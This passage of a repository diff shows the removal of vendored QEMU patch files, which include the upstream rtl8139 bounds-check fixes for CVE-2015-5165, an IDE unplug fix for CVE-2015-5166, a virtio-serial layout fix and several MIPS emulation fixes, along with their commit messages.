+ ip_data_len, saved_size - ETH_HLEN, large_send_mss);
- /* maximum IP header length is 60 bytes */
- uint8_t saved_ip_header[60];
+ int tcp_send_offset = 0;
+ int send_count = 0;
- /* save IP header template; data area is used in tcp checksum calculation */
- memcpy(saved_ip_header, eth_payload_data, hlen);
+ /* maximum IP header length is 60 bytes */
+ uint8_t saved_ip_header[60];
- /* a placeholder for checksum calculation routine in tcp case */
- uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
- // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
+ /* save IP header template; data area is used in tcp checksum calculation */
+ memcpy(saved_ip_header, eth_payload_data, hlen);
- /* pointer to TCP header */
- tcp_header *p_tcp_hdr = (tcp_header*)(eth_payload_data + hlen);
+ /* a placeholder for checksum calculation routine in tcp case */
+ uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
+ // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
- int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
+ /* pointer to TCP header */
+ tcp_header *p_tcp_hdr = (tcp_header*)(eth_payload_data + hlen);
- /* ETH_MTU = ip header len + tcp header len + payload */
- int tcp_data_len = ip_data_len - tcp_hlen;
- int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
+ int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
- DPRINTF("+++ C+ mode TSO IP data len %d TCP hlen %d TCP "
- "data len %d TCP chunk size %d\n", ip_data_len,
- tcp_hlen, tcp_data_len, tcp_chunk_size);
+ /* ETH_MTU = ip header len + tcp header len + payload */
+ int tcp_data_len = ip_data_len - tcp_hlen;
+ int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
- /* note the cycle below overwrites IP header data,
- but restores it from saved_ip_header before sending packet */
+ DPRINTF("+++ C+ mode TSO IP data len %d TCP hlen %d TCP "
+ "data len %d TCP chunk size %d\n", ip_data_len,
+ tcp_hlen, tcp_data_len, tcp_chunk_size);
- int is_last_frame = 0;
+ /* note the cycle below overwrites IP header data,
+ but restores it from saved_ip_header before sending packet */
- for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
- {
- uint16_t chunk_size = tcp_chunk_size;
-
- /* check if this is the last frame */
- if (tcp_send_offset + tcp_chunk_size >= tcp_data_len)
- {
- is_last_frame = 1;
- chunk_size = tcp_data_len - tcp_send_offset;
- }
-
- DPRINTF("+++ C+ mode TSO TCP seqno %08x\n",
- be32_to_cpu(p_tcp_hdr->th_seq));
-
- /* add 4 TCP pseudoheader fields */
- /* copy IP source and destination fields */
- memcpy(data_to_checksum, saved_ip_header + 12, 8);
-
- DPRINTF("+++ C+ mode TSO calculating TCP checksum for "
- "packet with %d bytes data\n", tcp_hlen +
- chunk_size);
-
- if (tcp_send_offset)
- {
- memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
- }
-
- /* keep PUSH and FIN flags only for the last frame */
- if (!is_last_frame)
- {
- TCP_HEADER_CLEAR_FLAGS(p_tcp_hdr, TCP_FLAG_PUSH|TCP_FLAG_FIN);
- }
-
- /* recalculate TCP checksum */
- ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
- p_tcpip_hdr->zeros = 0;
- p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
- p_tcpip_hdr->ip_payload = cpu_to_be16(tcp_hlen + chunk_size);
-
- p_tcp_hdr->th_sum = 0;
-
- int tcp_checksum = ip_checksum(data_to_checksum, tcp_hlen + chunk_size + 12);
- DPRINTF("+++ C+ mode TSO TCP checksum %04x\n",
- tcp_checksum);
-
- p_tcp_hdr->th_sum = tcp_checksum;
-
- /* restore IP header */
- memcpy(eth_payload_data, saved_ip_header, hlen);
-
- /* set IP data length and recalculate IP checksum */
- ip->ip_len = cpu_to_be16(hlen + tcp_hlen + chunk_size);
-
- /* increment IP id for subsequent frames */
- ip->ip_id = cpu_to_be16(tcp_send_offset/tcp_chunk_size + be16_to_cpu(ip->ip_id));
-
- ip->ip_sum = 0;
- ip->ip_sum = ip_checksum(eth_payload_data, hlen);
- DPRINTF("+++ C+ mode TSO IP header len=%d "
- "checksum=%04x\n", hlen, ip->ip_sum);
-
- int tso_send_size = ETH_HLEN + hlen + tcp_hlen + chunk_size;
- DPRINTF("+++ C+ mode TSO transferring packet size "
- "%d\n", tso_send_size);
- rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
- 0, (uint8_t *) dot1q_buffer);
-
- /* add transferred count to TCP sequence number */
- p_tcp_hdr->th_seq = cpu_to_be32(chunk_size + be32_to_cpu(p_tcp_hdr->th_seq));
- ++send_count;
- }
+ int is_last_frame = 0;
- /* Stop sending this frame */
- saved_size = 0;
- }
- else if (txdw0 & (CP_TX_TCPCS|CP_TX_UDPCS))
+ for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len; tcp_send_offset += tcp_chunk_size)
{
- DPRINTF("+++ C+ mode need TCP or UDP checksum\n");
+ uint16_t chunk_size = tcp_chunk_size;
- /* maximum IP header length is 60 bytes */
- uint8_t saved_ip_header[60];
- memcpy(saved_ip_header, eth_payload_data, hlen);
+ /* check if this is the last frame */
+ if (tcp_send_offset + tcp_chunk_size >= tcp_data_len)
+ {
+ is_last_frame = 1;
+ chunk_size = tcp_data_len - tcp_send_offset;
+ }
- uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
- // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
+ DPRINTF("+++ C+ mode TSO TCP seqno %08x\n",
+ be32_to_cpu(p_tcp_hdr->th_seq));
/* add 4 TCP pseudoheader fields */
/* copy IP source and destination fields */
memcpy(data_to_checksum, saved_ip_header + 12, 8);
- if ((txdw0 & CP_TX_TCPCS) && ip_protocol == IP_PROTO_TCP)
+ DPRINTF("+++ C+ mode TSO calculating TCP checksum for "
+ "packet with %d bytes data\n", tcp_hlen +
+ chunk_size);
+
+ if (tcp_send_offset)
{
- DPRINTF("+++ C+ mode calculating TCP checksum for "
- "packet with %d bytes data\n", ip_data_len);
+ memcpy((uint8_t*)p_tcp_hdr + tcp_hlen, (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset, chunk_size);
+ }
- ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
- p_tcpip_hdr->zeros = 0;
- p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
- p_tcpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+ /* keep PUSH and FIN flags only for the last frame */
+ if (!is_last_frame)
+ {
+ TCP_HEADER_CLEAR_FLAGS(p_tcp_hdr, TCP_FLAG_PUSH|TCP_FLAG_FIN);
+ }
- tcp_header* p_tcp_hdr = (tcp_header *) (data_to_checksum+12);
+ /* recalculate TCP checksum */
+ ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
+ p_tcpip_hdr->zeros = 0;
+ p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
+ p_tcpip_hdr->ip_payload = cpu_to_be16(tcp_hlen + chunk_size);
- p_tcp_hdr->th_sum = 0;
+ p_tcp_hdr->th_sum = 0;
- int tcp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
- DPRINTF("+++ C+ mode TCP checksum %04x\n",
- tcp_checksum);
+ int tcp_checksum = ip_checksum(data_to_checksum, tcp_hlen + chunk_size + 12);
+ DPRINTF("+++ C+ mode TSO TCP checksum %04x\n",
+ tcp_checksum);
- p_tcp_hdr->th_sum = tcp_checksum;
- }
- else if ((txdw0 & CP_TX_UDPCS) && ip_protocol == IP_PROTO_UDP)
- {
- DPRINTF("+++ C+ mode calculating UDP checksum for "
- "packet with %d bytes data\n", ip_data_len);
+ p_tcp_hdr->th_sum = tcp_checksum;
- ip_pseudo_header *p_udpip_hdr = (ip_pseudo_header *)data_to_checksum;
- p_udpip_hdr->zeros = 0;
- p_udpip_hdr->ip_proto = IP_PROTO_UDP;
- p_udpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+ /* restore IP header */
+ memcpy(eth_payload_data, saved_ip_header, hlen);
- udp_header *p_udp_hdr = (udp_header *) (data_to_checksum+12);
+ /* set IP data length and recalculate IP checksum */
+ ip->ip_len = cpu_to_be16(hlen + tcp_hlen + chunk_size);
- p_udp_hdr->uh_sum = 0;
+ /* increment IP id for subsequent frames */
+ ip->ip_id = cpu_to_be16(tcp_send_offset/tcp_chunk_size + be16_to_cpu(ip->ip_id));
- int udp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
- DPRINTF("+++ C+ mode UDP checksum %04x\n",
- udp_checksum);
+ ip->ip_sum = 0;
+ ip->ip_sum = ip_checksum(eth_payload_data, hlen);
+ DPRINTF("+++ C+ mode TSO IP header len=%d "
+ "checksum=%04x\n", hlen, ip->ip_sum);
- p_udp_hdr->uh_sum = udp_checksum;
- }
+ int tso_send_size = ETH_HLEN + hlen + tcp_hlen + chunk_size;
+ DPRINTF("+++ C+ mode TSO transferring packet size "
+ "%d\n", tso_send_size);
+ rtl8139_transfer_frame(s, saved_buffer, tso_send_size,
+ 0, (uint8_t *) dot1q_buffer);
- /* restore IP header */
- memcpy(eth_payload_data, saved_ip_header, hlen);
+ /* add transferred count to TCP sequence number */
+ p_tcp_hdr->th_seq = cpu_to_be32(chunk_size + be32_to_cpu(p_tcp_hdr->th_seq));
+ ++send_count;
}
+
+ /* Stop sending this frame */
+ saved_size = 0;
+ }
+ else if (txdw0 & (CP_TX_TCPCS|CP_TX_UDPCS))
+ {
+ DPRINTF("+++ C+ mode need TCP or UDP checksum\n");
+
+ /* maximum IP header length is 60 bytes */
+ uint8_t saved_ip_header[60];
+ memcpy(saved_ip_header, eth_payload_data, hlen);
+
+ uint8_t *data_to_checksum = eth_payload_data + hlen - 12;
+ // size_t data_to_checksum_len = eth_payload_len - hlen + 12;
+
+ /* add 4 TCP pseudoheader fields */
+ /* copy IP source and destination fields */
+ memcpy(data_to_checksum, saved_ip_header + 12, 8);
+
+ if ((txdw0 & CP_TX_TCPCS) && ip_protocol == IP_PROTO_TCP)
+ {
+ DPRINTF("+++ C+ mode calculating TCP checksum for "
+ "packet with %d bytes data\n", ip_data_len);
+
+ ip_pseudo_header *p_tcpip_hdr = (ip_pseudo_header *)data_to_checksum;
+ p_tcpip_hdr->zeros = 0;
+ p_tcpip_hdr->ip_proto = IP_PROTO_TCP;
+ p_tcpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+
+ tcp_header* p_tcp_hdr = (tcp_header *) (data_to_checksum+12);
+
+ p_tcp_hdr->th_sum = 0;
+
+ int tcp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
+ DPRINTF("+++ C+ mode TCP checksum %04x\n",
+ tcp_checksum);
+
+ p_tcp_hdr->th_sum = tcp_checksum;
+ }
+ else if ((txdw0 & CP_TX_UDPCS) && ip_protocol == IP_PROTO_UDP)
+ {
+ DPRINTF("+++ C+ mode calculating UDP checksum for "
+ "packet with %d bytes data\n", ip_data_len);
+
+ ip_pseudo_header *p_udpip_hdr = (ip_pseudo_header *)data_to_checksum;
+ p_udpip_hdr->zeros = 0;
+ p_udpip_hdr->ip_proto = IP_PROTO_UDP;
+ p_udpip_hdr->ip_payload = cpu_to_be16(ip_data_len);
+
+ udp_header *p_udp_hdr = (udp_header *) (data_to_checksum+12);
+
+ p_udp_hdr->uh_sum = 0;
+
+ int udp_checksum = ip_checksum(data_to_checksum, ip_data_len + 12);
+ DPRINTF("+++ C+ mode UDP checksum %04x\n",
+ udp_checksum);
+
+ p_udp_hdr->uh_sum = udp_checksum;
+ }
+
+ /* restore IP header */
+ memcpy(eth_payload_data, saved_ip_header, hlen);
}
}
--
2.1.4

39
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-3.patch vendored
View File

@ -1,39 +0,0 @@
From 043d28507ef7c5fdc34866f5e3b27a72bd0cd072 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:00 +0100
Subject: [PATCH 3/7] rtl8139: skip offload on short Ethernet/IP header
Transmit offload features access Ethernet and IP headers the packet. If
the packet is too short we must not attempt to access header fields:
int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
...
eth_payload_data = saved_buffer + ETH_HLEN;
...
ip = (ip_header*)eth_payload_data;
if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index 2f12d42..d377b6b 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2164,6 +2164,11 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
{
DPRINTF("+++ C+ mode offloaded task checksum\n");
+ /* Large enough for Ethernet and IP headers? */
+ if (saved_size < ETH_HLEN + sizeof(ip_header)) {
+ goto skip_offload;
+ }
+
/* ip packet header */
ip_header *ip = NULL;
int hlen = 0;
--
2.1.4

53
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-4.patch vendored
View File

@ -1,53 +0,0 @@
From 5a75d242fe019d05b46ef9bc330a6892525c84a7 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:01 +0100
Subject: [PATCH 4/7] rtl8139: check IP Header Length field
The IP Header Length field was only checked in the IP checksum case, but
is used in other cases too.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 19 ++++++++-----------
1 file changed, 8 insertions(+), 11 deletions(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index d377b6b..cd5ac05 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2200,6 +2200,10 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
}
hlen = IP_HEADER_LENGTH(ip);
+ if (hlen < sizeof(ip_header) || hlen > eth_payload_len) {
+ goto skip_offload;
+ }
+
ip_protocol = ip->ip_p;
ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
@@ -2207,17 +2211,10 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
{
DPRINTF("+++ C+ mode need IP checksum\n");
- if (hlen<sizeof(ip_header) || hlen>eth_payload_len) {/* min header length */
- /* bad packet header len */
- /* or packet too short */
- }
- else
- {
- ip->ip_sum = 0;
- ip->ip_sum = ip_checksum(ip, hlen);
- DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
- hlen, ip->ip_sum);
- }
+ ip->ip_sum = 0;
+ ip->ip_sum = ip_checksum(ip, hlen);
+ DPRINTF("+++ C+ mode IP header len=%d checksum=%04x\n",
+ hlen, ip->ip_sum);
}
if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
--
2.1.4

34
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-5.patch vendored
View File

@ -1,34 +0,0 @@
From 6c79ea275d72bc1fd88bdcf1e7d231b2c9c865de Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:02 +0100
Subject: [PATCH 5/7] rtl8139: check IP Total Length field
The IP Total Length field includes the IP header and data. Make sure it
is valid and does not exceed the Ethernet payload size.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index cd5ac05..ed2b23b 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2205,7 +2205,12 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
}
ip_protocol = ip->ip_p;
- ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
+
+ ip_data_len = be16_to_cpu(ip->ip_len);
+ if (ip_data_len < hlen || ip_data_len > eth_payload_len) {
+ goto skip_offload;
+ }
+ ip_data_len -= hlen;
if (txdw0 & CP_TX_IPCS)
{
--
2.1.4

35
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-6.patch vendored
View File

@ -1,35 +0,0 @@
From 30aa7be430e7c982e9163f3bcc745d3aa57b6aa4 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:03 +0100
Subject: [PATCH 6/7] rtl8139: skip offload on short TCP header
TCP Large Segment Offload accesses the TCP header in the packet. If the
packet is too short we must not attempt to access header fields:
tcp_header *p_tcp_hdr = (tcp_header*)(eth_payload_data + hlen);
int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index ed2b23b..c8f0df9 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2224,6 +2224,11 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
if ((txdw0 & CP_TX_LGSEN) && ip_protocol == IP_PROTO_TCP)
{
+ /* Large enough for the TCP header? */
+ if (ip_data_len < sizeof(tcp_header)) {
+ goto skip_offload;
+ }
+
int large_send_mss = (txdw0 >> 16) & CP_TC_LGSEN_MSS_MASK;
DPRINTF("+++ C+ mode offloaded task TSO MTU=%d IP data %d "
--
2.1.4

32
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5165-7.patch vendored
View File

@ -1,32 +0,0 @@
From 9a084807bf6ca7c16d997a236d304111894a6539 Mon Sep 17 00:00:00 2001
From: Stefan Hajnoczi <stefanha@redhat.com>
Date: Wed, 15 Jul 2015 18:17:04 +0100
Subject: [PATCH 7/7] rtl8139: check TCP Data Offset field
The TCP Data Offset field contains the length of the header. Make sure
it is valid and does not exceed the IP data length.
Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
---
hw/net/rtl8139.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/hw/net/rtl8139.c b/hw/net/rtl8139.c
index c8f0df9..2df4a51 100644
--- a/hw/net/rtl8139.c
+++ b/hw/net/rtl8139.c
@@ -2253,6 +2253,11 @@ static int rtl8139_cplus_transmit_one(RTL8139State *s)
int tcp_hlen = TCP_HEADER_DATA_OFFSET(p_tcp_hdr);
+ /* Invalid TCP data offset? */
+ if (tcp_hlen < sizeof(tcp_header) || tcp_hlen > ip_data_len) {
+ goto skip_offload;
+ }
+
/* ETH_MTU = ip header len + tcp header len + payload */
int tcp_data_len = ip_data_len - tcp_hlen;
int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
--
2.1.4

36
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-CVE-2015-5166.patch vendored
View File

@ -1,36 +0,0 @@
From: Stefano Stabellini <stefano.stabellini@eu.citrix.com>
Fix release_drive on unplugged devices (pci_piix3_xen_ide_unplug)
pci_piix3_xen_ide_unplug should completely unhook the unplugged
IDEDevice from the corresponding BlockBackend, otherwise the next call
to release_drive will try to detach the drive again.
Suggested-by: Kevin Wolf <kwolf@redhat.com>
Signed-off-by: Stefano Stabellini <stefano.stabellini@eu.citrix.com>
diff --git a/hw/ide/piix.c b/hw/ide/piix.c
index adb6649..5a26c86 100644
--- a/hw/ide/piix.c
+++ b/hw/ide/piix.c
@@ -169,6 +169,7 @@ int pci_piix3_xen_ide_unplug(DeviceState *dev)
PCIIDEState *pci_ide;
DriveInfo *di;
int i;
+ IDEDevice *idedev;
pci_ide = PCI_IDE(dev);
@@ -181,6 +182,12 @@ int pci_piix3_xen_ide_unplug(DeviceState *dev)
blk_detach_dev(blk, ds);
}
pci_ide->bus[di->bus].ifs[di->unit].blk = NULL;
+ if (!(i % 2)) {
+ idedev = pci_ide->bus[di->bus].master;
+ } else {
+ idedev = pci_ide->bus[di->bus].slave;
+ }
+ idedev->conf.blk = NULL;
blk_unref(blk);
}
}

34
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.3.0-virtio-serial.patch vendored
View File

@ -1,34 +0,0 @@
https://bugs.gentoo.org/557206
From 7882080388be5088e72c425b02223c02e6cb4295 Mon Sep 17 00:00:00 2001
From: "Michael S. Tsirkin" <mst@redhat.com>
Date: Thu, 23 Jul 2015 17:52:02 +0300
Subject: [PATCH] virtio-serial: fix ANY_LAYOUT
Don't assume a specific layout for control messages.
Required by virtio 1.
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Reviewed-by: Amit Shah <amit.shah@redhat.com>
Reviewed-by: Jason Wang <jasowang@redhat.com>
---
hw/char/virtio-serial-bus.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/hw/char/virtio-serial-bus.c b/hw/char/virtio-serial-bus.c
index 78c73e5..929e49c 100644
--- a/hw/char/virtio-serial-bus.c
+++ b/hw/char/virtio-serial-bus.c
@@ -195,7 +195,8 @@ static size_t send_control_msg(VirtIOSerial *vser, void *buf, size_t len)
return 0;
}
- memcpy(elem.in_sg[0].iov_base, buf, len);
+ /* TODO: detect a buffer that's too short, set NEEDS_RESET */
+ iov_from_buf(elem.in_sg, elem.in_num, 0, buf, len);
virtqueue_push(vq, &elem, len);
virtio_notify(VIRTIO_DEVICE(vser), vq);
--
2.4.4

78
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4-mips-fix-mtc0.patch vendored
View File

@ -1,78 +0,0 @@
From d54a299b83a07642c85a22bfe19b69ca4def9ec4 Mon Sep 17 00:00:00 2001
From: Leon Alrae <leon.alrae@imgtec.com>
Date: Wed, 9 Sep 2015 12:44:25 +0100
Subject: [PATCH] target-mips: correct MTC0 instruction on MIPS64
MTC0 on a 64-bit processor should move entire 64-bit GPR content to CP0
register.
Signed-off-by: Leon Alrae <leon.alrae@imgtec.com>
Reviewed-by: Aurelien Jarno <aurelien@aurel32.net>
---
target-mips/translate.c | 18 +++++++-----------
1 files changed, 7 insertions(+), 11 deletions(-)
diff --git a/target-mips/translate.c b/target-mips/translate.c
index 0883782..a59b670 100644
--- a/target-mips/translate.c
+++ b/target-mips/translate.c
@@ -4765,12 +4765,6 @@ static inline void gen_mtc0_store32 (TCGv arg, target_ulong off)
tcg_temp_free_i32(t0);
}
-static inline void gen_mtc0_store64 (TCGv arg, target_ulong off)
-{
- tcg_gen_ext32s_tl(arg, arg);
- tcg_gen_st_tl(arg, cpu_env, off);
-}
-
static void gen_mfhc0(DisasContext *ctx, TCGv arg, int reg, int sel)
{
const char *rn = "invalid";
@@ -5629,12 +5623,14 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
break;
case 5:
CP0_CHECK(ctx->insn_flags & ASE_MT);
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_VPESchedule));
+ tcg_gen_st_tl(arg, cpu_env,
+ offsetof(CPUMIPSState, CP0_VPESchedule));
rn = "VPESchedule";
break;
case 6:
CP0_CHECK(ctx->insn_flags & ASE_MT);
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_VPEScheFBack));
+ tcg_gen_st_tl(arg, cpu_env,
+ offsetof(CPUMIPSState, CP0_VPEScheFBack));
rn = "VPEScheFBack";
break;
case 7:
@@ -5884,7 +5880,7 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
case 14:
switch (sel) {
case 0:
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_EPC));
+ tcg_gen_st_tl(arg, cpu_env, offsetof(CPUMIPSState, CP0_EPC));
rn = "EPC";
break;
default:
@@ -6057,7 +6053,7 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
switch (sel) {
case 0:
/* EJTAG support */
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_DEPC));
+ tcg_gen_st_tl(arg, cpu_env, offsetof(CPUMIPSState, CP0_DEPC));
rn = "DEPC";
break;
default:
@@ -6160,7 +6156,7 @@ static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel)
case 30:
switch (sel) {
case 0:
- gen_mtc0_store64(arg, offsetof(CPUMIPSState, CP0_ErrorEPC));
+ tcg_gen_st_tl(arg, cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC));
rn = "ErrorEPC";
break;
default:
--
1.7.0.4

44
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4-mips-fix-rdhwr.patch vendored
View File

@ -1,44 +0,0 @@
From cdfcad788394ff53e317043e07b8e34f4987c659 Mon Sep 17 00:00:00 2001
From: Alex Smith <alex.smith@imgtec.com>
Date: Tue, 8 Sep 2015 11:34:11 +0100
Subject: [PATCH 1/1] target-mips: Fix RDHWR on CP0.Count
For RDHWR on the CP0.Count register, env->CP0_Count was being returned.
This value is a delta against the QEMU_CLOCK_VIRTUAL clock, not the
correct current value of CP0.Count. Use cpu_mips_get_count() instead.
Signed-off-by: Alex Smith <alex.smith@imgtec.com>
Cc: Aurelien Jarno <aurelien@aurel32.net>
Cc: Leon Alrae <leon.alrae@imgtec.com>
Reviewed-by: Leon Alrae <leon.alrae@imgtec.com>
Reviewed-by: Aurelien Jarno <aurelien@aurel32.net>
Signed-off-by: Leon Alrae <leon.alrae@imgtec.com>
---
target-mips/op_helper.c | 9 +++++++--
1 files changed, 7 insertions(+), 2 deletions(-)
diff --git a/target-mips/op_helper.c b/target-mips/op_helper.c
index 1aa9e3c..94de108 100644
--- a/target-mips/op_helper.c
+++ b/target-mips/op_helper.c
@@ -2184,10 +2184,15 @@ target_ulong helper_rdhwr_synci_step(CPUMIPSState *env)
target_ulong helper_rdhwr_cc(CPUMIPSState *env)
{
if ((env->hflags & MIPS_HFLAG_CP0) ||
- (env->CP0_HWREna & (1 << 2)))
+ (env->CP0_HWREna & (1 << 2))) {
+#ifdef CONFIG_USER_ONLY
return env->CP0_Count;
- else
+#else
+ return (int32_t)cpu_mips_get_count(env);
+#endif
+ } else {
helper_raise_exception(env, EXCP_RI);
+ }
return 0;
}
--
1.7.0.4

89
sdk_container/src/third_party/portage-stable/app-emulation/qemu/files/qemu-2.4-mips-move-interrupts-new-func.patch vendored
View File

@ -1,89 +0,0 @@
Pending upstream inclusion
Link: https://lists.gnu.org/archive/html/qemu-devel/2015-09/msg03573.html
Patchwork: https://patchwork.ozlabs.org/patch/517392/
X-Gentoo-Bug: 563162
X-Gentoo-Bug-URL: https://bugs.gentoo.org/show_bug.cgi?id=563162
Signed-off-by: Markos Chandras <hwoarang@gentoo.org>
diff --git a/target-mips/cpu.c b/target-mips/cpu.c
index 4027d0f..144eea9 100644
--- a/target-mips/cpu.c
+++ b/target-mips/cpu.c
@@ -58,7 +58,9 @@ static bool mips_cpu_has_work(CPUState *cs)
check for interrupts that can be taken. */
if ((cs->interrupt_request & CPU_INTERRUPT_HARD) &&
cpu_mips_hw_interrupts_pending(env)) {
- has_work = true;
+ if (cpu_mips_hw_interrupts_enabled(env)) {
+ has_work = true;
+ }
}
/* MIPS-MT has the ability to halt the CPU. */
diff --git a/target-mips/cpu.h b/target-mips/cpu.h
index c91883d..210370e 100644
--- a/target-mips/cpu.h
+++ b/target-mips/cpu.h
@@ -639,23 +639,24 @@ static inline int cpu_mmu_index (CPUMIPSState *env)
return env->hflags & MIPS_HFLAG_KSU;
}
-static inline int cpu_mips_hw_interrupts_pending(CPUMIPSState *env)
+static inline bool cpu_mips_hw_interrupts_enabled(CPUMIPSState *env)
{
- int32_t pending;
- int32_t status;
- int r;
-
- if (!(env->CP0_Status & (1 << CP0St_IE)) ||
- (env->CP0_Status & (1 << CP0St_EXL)) ||
- (env->CP0_Status & (1 << CP0St_ERL)) ||
+ return (env->CP0_Status & (1 << CP0St_IE)) &&
+ !(env->CP0_Status & (1 << CP0St_EXL)) &&
+ !(env->CP0_Status & (1 << CP0St_ERL)) &&
+ !(env->hflags & MIPS_HFLAG_DM) &&
/* Note that the TCStatus IXMT field is initialized to zero,
and only MT capable cores can set it to one. So we don't
need to check for MT capabilities here. */
- (env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT)) ||
- (env->hflags & MIPS_HFLAG_DM)) {
- /* Interrupts are disabled */
- return 0;
- }
+ !(env->active_tc.CP0_TCStatus & (1 << CP0TCSt_IXMT));
+}
+
+/* Check if there is pending and not masked out interrupt */
+static inline bool cpu_mips_hw_interrupts_pending(CPUMIPSState *env)
+{
+ int32_t pending;
+ int32_t status;
+ bool r;
pending = env->CP0_Cause & CP0Ca_IP_mask;
status = env->CP0_Status & CP0Ca_IP_mask;
@@ -669,7 +670,7 @@ static inline int cpu_mips_hw_interrupts_pending(CPUMIPSState *env)
/* A MIPS configured with compatibility or VInt (Vectored Interrupts)
treats the pending lines as individual interrupt lines, the status
lines are individual masks. */
- r = pending & status;
+ r = (pending & status) != 0;
}
return r;
}
diff --git a/target-mips/helper.c b/target-mips/helper.c
index 01c4461..2d86323 100644
--- a/target-mips/helper.c
+++ b/target-mips/helper.c
@@ -759,7 +759,8 @@ bool mips_cpu_exec_interrupt(CPUState *cs, int interrupt_request)
MIPSCPU *cpu = MIPS_CPU(cs);
CPUMIPSState *env = &cpu->env;
- if (cpu_mips_hw_interrupts_pending(env)) {
+ if (cpu_mips_hw_interrupts_enabled(env) &&
+ cpu_mips_hw_interrupts_pending(env)) {
/* Raise it */
